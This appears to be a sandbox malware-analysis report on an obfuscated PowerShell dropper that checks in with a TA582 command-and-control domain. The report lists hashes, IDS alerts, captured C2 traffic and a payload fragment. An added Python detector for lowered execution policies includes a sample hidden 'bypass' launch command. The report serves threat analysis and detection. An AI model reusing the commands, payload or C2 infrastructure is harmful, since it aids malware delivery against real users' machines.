kcehmenjdibnmni.top | download.ps1 | malicious | Unknown | 45.61.136.138
kcehmenjdibnmni.top | download.ps1 | malicious | Unknown | 45.61.136.138
kcehmenjdibnmni.top | download.ps1 | malicious | Unknown | 45.61.136.138
kcehmenjdibnmni.top | download.ps1 | malicious | Unknown | 45.61.136.138
kcehmenjdibnmni.top | download.ps1 | malicious | Unknown | 45.61.136.138
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS40676 (US) | Fantazy.spc.elf | malicious | Unknown | 41.216.189.243
AS40676 (US) | armv6l.elf | malicious | Mirai | 23.179.122.63
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | EwpsQzeky5.msi | malicious | Unknown | 193.32.177.34
AS40676 (US) | EwpsQzeky5.msi | malicious | Unknown | 193.32.177.34
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulNg7/l/lZ:NllUy7/
MD5: C2537D289A7DB67172EF4C08F96CB120
SHA1: 95114E0682CC761B86321F0DCC5CBE9A3E89DB21
SHA-256: 26D1A27AED70765338B4BCFEDC7C23289CFDA9A984B1A55799FB89CFAE10C3C9
SHA-512: B991F49ECB907FA7CFCF6121BA004C1C5156A86F508E22B76FD1E53B21B7D6C4831EFF8EBCFB2CC9CB97E44DD578B276B734CB1D3CE96355E51C4578FB227603
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........

Four dropped files share the following content and hashes (the report lists them as separate entries; the fourth carries no reputation line):
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Two dropped files share the following content and hashes (the report lists them as separate entries):
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7353141659838265
Encrypted: false
SSDEEP: 96:3q233CxH1YkvhkvCCtu3ENM4KHoaENM4KHoy:3q2yVEu3+Ra+Ry
MD5: 9147E03E2BA785B9E06130576F468539
SHA1: CDE3A39093F90A14EDF9E2BEAC8542D870EFB96B
SHA-256: 001871D8941B1B3112927AEF274FABCB5CEA90CA1604EE1AE3C6428A00F51C85
SHA-512: 1054E5AD0E2139D575A4B575AA0DFFFA9FB60D989792AD063476C8581737A71276F6A5666A1971C8A33D915FD8AC1348A773115B939657E466220D93F6C3CD39
Malicious: false
Preview: ...................................FL..................F.".. ...-/.v.....:..E_..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....,..E_....#.E_......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^%Zx=...........................%..A.p.p.D.a.t.a...B.V.1.....%Z{=..Roaming.@......CW.^%Z{=.............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^%Z.=....Q...........
File type: ASCII text, with very long lines (10921), with CRLF line terminators
Entropy (8bit): 5.9430088555868075
TrID:
File name: download.ps1
File size: 20'628 bytes
MD5: 99e9af1d265f8b0fc8e512e80f07d739
SHA1: 7433e52e040e3d3c71e5514064b49bbbb25ea7c7
SHA256: aa7a1ee6564e0c793d61c6ab01555d316ca42bc71b7cf6c33a7cc66d5ccf48be
SHA512: 2319e42105edb7fffc3d5112fe3ee4c41eec1a3e6563b7f0ced91ef9bbc1a8fc23a463389e03457df2380584539e18b2e3219ffa480389296068030c22d732d2
SSDEEP: 384:tTcBKzKgVpRDtD5lFFFqBk/qV3aAiKpXuhhBJmeeVB6MAJXKd9NPxwZJckwzv:tUAKapbRF9qVKAi8WbweeVsMdPKnwD
TLSH: BF926CC57788EDE042CDC32EA61AAD083F6A649DE1ABBFC0F4EA918373411456E59CC1
File Content Preview: $witfxus=$executioncontext;$eriserisbealinesatreesalorbe = ([ChaR[]]@((-9485+(16032-6494)),(4320-(-4278+8546)),(8683-(872+7754)),(7762-(14935-7223)),(147168/(3106296/(-1077+2259))),(9056-9002),(2329-2273),(-4924+4979),(559405/10171),(6777-6727),(-334+390)
Icon Hash: 3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-05T08:44:05.964108+0100 | 2859488 | ETPRO MALWARE TA582 Domain in DNS Lookup | 1 | 192.168.2.4 | 61736 | 1.1.1.1 | 53 | UDP
2025-01-05T08:44:07.183699+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | TCP
2025-01-05T08:44:07.183699+0100 | 2057741 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | TCP
2025-01-05T08:44:07.821517+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.4 | 49731 | 142.250.185.164 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 08:44:05.964107990 CET | 61736 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 08:44:06.485321999 CET | 53 | 61736 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 08:44:07.140050888 CET | 59846 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 08:44:07.147943974 CET | 53 | 59846 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 08:44:05.964107990 CET | 192.168.2.4 | 1.1.1.1 | 0xadfa | Standard query (0) | kcehmenjdibnmni.top | A (IP address) | IN (0x0001) | false
Jan 5, 2025 08:44:07.140050888 CET | 192.168.2.4 | 1.1.1.1 | 0xf4b5 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 08:44:06.485321999 CET | 1.1.1.1 | 192.168.2.4 | 0xadfa | No error (0) | kcehmenjdibnmni.top | (none) | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 08:44:07.147943974 CET | 1.1.1.1 | 192.168.2.4 | 0xf4b5 | No error (0) | www.google.com | (none) | 142.250.185.164 | A (IP address) | IN (0x0001) | false

• kcehmenjdibnmni.top
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | 7356 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 5, 2025 08:44:06.505407095 CET | 215 | OUT | GET /trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: kcehmenjdibnmni.top
Connection: Keep-Alive
Jan 5, 2025 08:44:07.136833906 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 05 Jan 2025 07:44:07 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 142.250.185.164 | 80 | 7356 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 5, 2025 08:44:07.161339045 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Jan 5, 2025 08:44:07.821418047 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 07:44:07 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-id1cOR58uDo3nXmvhgL8Qw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-XfRDeu_k3yzfbXqetrsy4_2Nxs7GHMv41e_SFBVuUoNb1SNSc-pA8; expires=Fri, 04-Jul-2025 07:44:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=YNueLCNty0NO0NsI5WHmCzuQ3NUQ--TRQSRVynkaW06dxj8puHbqDl5EUq-q0agQJia36PRAhCuS2BXdNQYz1SqZ7jEsB8qqnQMccWqJrx-YbiHS1R_b4ZbSk1z7EH65ctTF01w7jCxiCqnU4A3SeZjVSO2x4SZRiq_yu2h8GSBhDE6dy5TxjeNEBwUGF3dInU7n08pI; expires=Mon, 07-Jul-2025 07:44:07 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
Data Ascii: 4449<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                  Jan 5, 2025 08:44:07.821639061 CET1236INData Raw: 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 67 62 6d 6c 62 2d 68
                                                                                                  Data Ascii: gin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;c
                                                                                                  Jan 5, 2025 08:44:07.826379061 CET1236INData Raw: 2e 67 62 70 63 20 2e 67 62 70 73 2c 2e 67 62 70 63 20 2e 67 62 70 73 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 23 67 62 6d 70 6c 70 2e 67 62 70 73 7b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67
                                                                                                  Data Ascii: .gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:.4;filter:alpha(opacity=40)

Target ID: 0
Start time: 02:43:59
Start date: 05/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 02:43:59
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
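The powershell.exe record above is what the report's Sigma hit "Change PowerShell Policies to an Insecure Level" keys on: the sample was launched with -ExecutionPolicy unrestricted, which switches off script-signing enforcement for that session. The Python below is an added example of running that check over process-creation records; it is not part of the Joe Sandbox report and does not reproduce the Sigma rule's own logic. The first two sample records are the two processes listed above; the other two are constructed for the example, and the short-form handling (-ep, and any prefix from -ex onward, which PowerShell resolves to ExecutionPolicy) is this example's own choice.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Policy values that turn off script-signing enforcement entirely.
INSECURE_POLICIES = {"unrestricted", "bypass"}

# Images whose command line carries PowerShell host parameters.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

EXEC_POLICY_PARAM = "executionpolicy"


@dataclass
class ProcessEvent:
    """One process-creation record (only the fields this check needs)."""
    pid: int
    image: str
    command_line: str


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Tokenise a Windows command line into double-quoted strings or runs of
    non-whitespace. shlex is avoided on purpose: its POSIX mode eats the
    backslashes in Windows paths."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def is_execution_policy_switch(token: str) -> bool:
    """True for -ExecutionPolicy and the abbreviations PowerShell resolves to it.
    PowerShell accepts any unambiguous parameter prefix, so -ep, -ex, -exec,
    ... all select ExecutionPolicy; matching is case-insensitive."""
    if not token or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ep" or (name.startswith("ex") and EXEC_POLICY_PARAM.startswith(name))


def insecure_execution_policy(event: ProcessEvent) -> Optional[str]:
    """Return the insecure policy value requested on the command line, or None."""
    image_name = event.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image_name not in POWERSHELL_IMAGES:
        return None
    tokens = split_windows_cmdline(event.command_line)
    # Skip argv[0]; a switch only counts if a value follows it.
    for i in range(1, len(tokens) - 1):
        if is_execution_policy_switch(tokens[i]):
            value = tokens[i + 1].lower()
            if value in INSECURE_POLICIES:
                return value
    return None


def triage(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (pid, policy) for every event that lowers the execution policy."""
    hits = []
    for ev in events:
        policy = insecure_execution_policy(ev)
        if policy is not None:
            hits.append((ev.pid, policy))
    return hits


# The first two records are the processes listed in this report; the last
# two are constructed for the example.
SAMPLE_EVENTS = [
    ProcessEvent(7356, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
                 r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"'),
    ProcessEvent(7364, r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessEvent(7400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -nop -w hidden -ep bypass -c "iex (gc stage2.txt)"'),
    ProcessEvent(7500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1"),
]

if __name__ == "__main__":
    for pid, policy in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: ExecutionPolicy set to {policy}")
```

The execution policy is a per-session setting that any user can override from the command line, so Microsoft does not treat it as a security boundary; the value of this check is the context it surfaces (which parent launched PowerShell with the policy lowered, and what -file or -c it was handed), not the policy change by itself.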

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7y2$ 7y2$'_H
                                                                                                    • API String ID: 0-3659216923
                                                                                                    • Opcode ID: c296d7ace04591ecb5cd78a292e7770394ff8fe1395f199b6007699b90cc86bc
                                                                                                    • Instruction ID: 348014ded1b5044fb8f8957d1465019f28259fd085d44b8d243639f078b65af8
                                                                                                    • Opcode Fuzzy Hash: c296d7ace04591ecb5cd78a292e7770394ff8fe1395f199b6007699b90cc86bc
                                                                                                    • Instruction Fuzzy Hash: 71B2F531B0EA894FE7A9EB6888656B4BBE1EF64300F1901FED05DC71E7DE24AC458741
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 69f87aee7d62473ebbe7787b131182e50598b19365965e885c7871e64c96ba9c
                                                                                                    • Instruction ID: 3a708e7e036d4e06e8bb1bf9c09c64d9f6666c5a84a51dc10b479e38af76568a
                                                                                                    • Opcode Fuzzy Hash: 69f87aee7d62473ebbe7787b131182e50598b19365965e885c7871e64c96ba9c
                                                                                                    • Instruction Fuzzy Hash: 1CF1A630A18A8E8FEFA8DF68C8557E93BD1FF58310F14426EE84DC7295DB3499458B81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 966c30ef239f575a7d6be0c8bcd9ea041ec62e86967886f236057c03f08c3fad
                                                                                                    • Instruction ID: a7fe286f9908d21700c10911e9c4d20dda7fc7fb3f7b1c486da5672bd52cff7f
                                                                                                    • Opcode Fuzzy Hash: 966c30ef239f575a7d6be0c8bcd9ea041ec62e86967886f236057c03f08c3fad
                                                                                                    • Instruction Fuzzy Hash: E0E1A330A09A4E8FEFA8DF28C8557E97BD1FF58310F14426AE84DC7295DF7499418B82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7y2$x6y2$'_L
                                                                                                    • API String ID: 0-4039748445
                                                                                                    • Opcode ID: 06c28e1521b5c17de120b9aacc6e1e8bf31aeb0bb105a6e5aef8a2c1def0423d
                                                                                                    • Instruction ID: 6e84be9a68fee22e4e56edb26512ba66cfd6e442de681565b2d05218c341460d
                                                                                                    • Opcode Fuzzy Hash: 06c28e1521b5c17de120b9aacc6e1e8bf31aeb0bb105a6e5aef8a2c1def0423d
                                                                                                    • Instruction Fuzzy Hash: DAA2D431B0DA494FEBA9EB5888A5AA4BBE1EF64300F1941BDD04DC71E3DE35AC46C741
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 7y2$x6y2
                                                                                                    • API String ID: 0-1471476893
                                                                                                    • Opcode ID: 57f7ae4394c96f681ce2fd452d5593f611b54793155e1f3bcc4bff5ff61fb366
                                                                                                    • Instruction ID: d0a7e75c0a39369baa3e16dacd641ea4140bb436d0def55844b2ec07bebd5f9e
                                                                                                    • Opcode Fuzzy Hash: 57f7ae4394c96f681ce2fd452d5593f611b54793155e1f3bcc4bff5ff61fb366
                                                                                                    • Instruction Fuzzy Hash: EFB2E571B0EA894FEBA9DB688865AA47BE1EF64300F1900FED05DC72D3DE65AC41C740
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1802721239.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bca1ce95619fe8108766e953cbfaf5e2fee68e791a24b54583ddee79cd1299aa
                                                                                                    • Instruction ID: 6eb8a954d3cb8d6c96a4031c02415d497558d6e9581469ee38fe381562228645
                                                                                                    • Opcode Fuzzy Hash: bca1ce95619fe8108766e953cbfaf5e2fee68e791a24b54583ddee79cd1299aa
                                                                                                    • Instruction Fuzzy Hash: 04F1C331B0DA894FEBA9EB288865AA47BE1EF65300F1900F9D05DC71D3DE35AD46C741
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f4c4bacdb0a93141c48de320800dc197c75c77eba2ac34cb199a3ec17296ad7d
                                                                                                    • Instruction ID: ac76b49a01e6b2fce9882ef7026bc0dff4168f2b2d5f8f320434b0fce496862f
                                                                                                    • Opcode Fuzzy Hash: f4c4bacdb0a93141c48de320800dc197c75c77eba2ac34cb199a3ec17296ad7d
                                                                                                    • Instruction Fuzzy Hash: CCB1B570609A4D8FEF68DF28D8557E93BE1FF59310F14426AE84DC7291CB7499418B82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799206719.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b76d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e2edf21a6c22879d14c8d2ec8f38328e7fee8683ef4cca854d03d14841a61552
                                                                                                    • Instruction ID: 072d05ca9e286a723e209646c80d1692ee54a213df8a9c4fefb6ca6047e8326f
                                                                                                    • Opcode Fuzzy Hash: e2edf21a6c22879d14c8d2ec8f38328e7fee8683ef4cca854d03d14841a61552
                                                                                                    • Instruction Fuzzy Hash: 7541267140EBC48FE7668B29D8559523FF0EF56320B1606DFD089CB1A3D625A846C7A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0af76d11365f986cc9ae94e065c49a1de40eb8797c410893dffcba00d011314
                                                                                                    • Instruction ID: 4cca51648a9261910364467800702ae70df6db02ab2308e0e84ed5184b8d622b
                                                                                                    • Opcode Fuzzy Hash: a0af76d11365f986cc9ae94e065c49a1de40eb8797c410893dffcba00d011314
                                                                                                    • Instruction Fuzzy Hash: 2B31847191CB4C9FDB189B5CD8466A97BE0FB99321F00422FE449D3651DB70A8568BC2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b007694405a1fd205b2187ce545653f1e8abfc87c455c8ad7e7d8056f770c1af
                                                                                                    • Instruction ID: 3b86d4619cd59c3a6e735242490a901b25709d3405361152d6671d64556c3ce0
                                                                                                    • Opcode Fuzzy Hash: b007694405a1fd205b2187ce545653f1e8abfc87c455c8ad7e7d8056f770c1af
                                                                                                    • Instruction Fuzzy Hash: 7C21073090C60C8FEF58DF9CD84A7E97BE0EB96321F00426BD449C3152D674A44ACB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14a73556186092edbf9f895b61d3f20ad248b9bd7309fed94865261e39e4fc1d
                                                                                                    • Instruction ID: 6e6e0f821f595f68e3be2af4b2f4b0ca6e189ce3eac30ea135acc4ba58ca630a
                                                                                                    • Opcode Fuzzy Hash: 14a73556186092edbf9f895b61d3f20ad248b9bd7309fed94865261e39e4fc1d
                                                                                                    • Instruction Fuzzy Hash: 35311E34A1D64E8EFBB4AF65CC15BF93A90FF49719F410139D44D860A3CB386A45CB11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4e297127774ec4456dfa6b61b2674fa10904ac3f72191b1f8fc84c0d9b1e4899
                                                                                                    • Instruction ID: eb4d8113da7701195aac9e177f25a7f4c218417092df201e75336c2391d23ea5
                                                                                                    • Opcode Fuzzy Hash: 4e297127774ec4456dfa6b61b2674fa10904ac3f72191b1f8fc84c0d9b1e4899
• Instruction Fuzzy Hash: 4201A73020CB0C4FD748EF0CE451AA5B7E0FB89360F10056EE58AC36A1D632E881CB41
Memory Dump Source
• Source File: 00000000.00000002.1803079395.00007FFD9BB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9bb30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4ef1e89386827d2fe6092d1edc41acedf5cd9f098daf255974e3bed766105237
• Instruction ID: d7c7e6df2a56b63a8414a6602824a8815e57b7cf2f5e92d8365c62fbcd59411f
• Opcode Fuzzy Hash: 4ef1e89386827d2fe6092d1edc41acedf5cd9f098daf255974e3bed766105237
• Instruction Fuzzy Hash: 31F06232A0E6494FD769EA5CE4618A477E0FF06324B1900B6E05CCB5BBDA25AC45C754
Memory Dump Source
• Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 205224a3054d39dda56c737a26e02bc252605e68b33294292c2554de281bc902
• Instruction ID: 79e01daa0c0224b34189a756adc7f7e1e5b06a871eb9732e88691cd0981c9bcf
• Opcode Fuzzy Hash: 205224a3054d39dda56c737a26e02bc252605e68b33294292c2554de281bc902
• Instruction Fuzzy Hash: 2FF0247080D68D8FDF16EF28881A4D87FA0FF16311B05029BE459C71B2DF64A554CBC2
Strings
Memory Dump Source
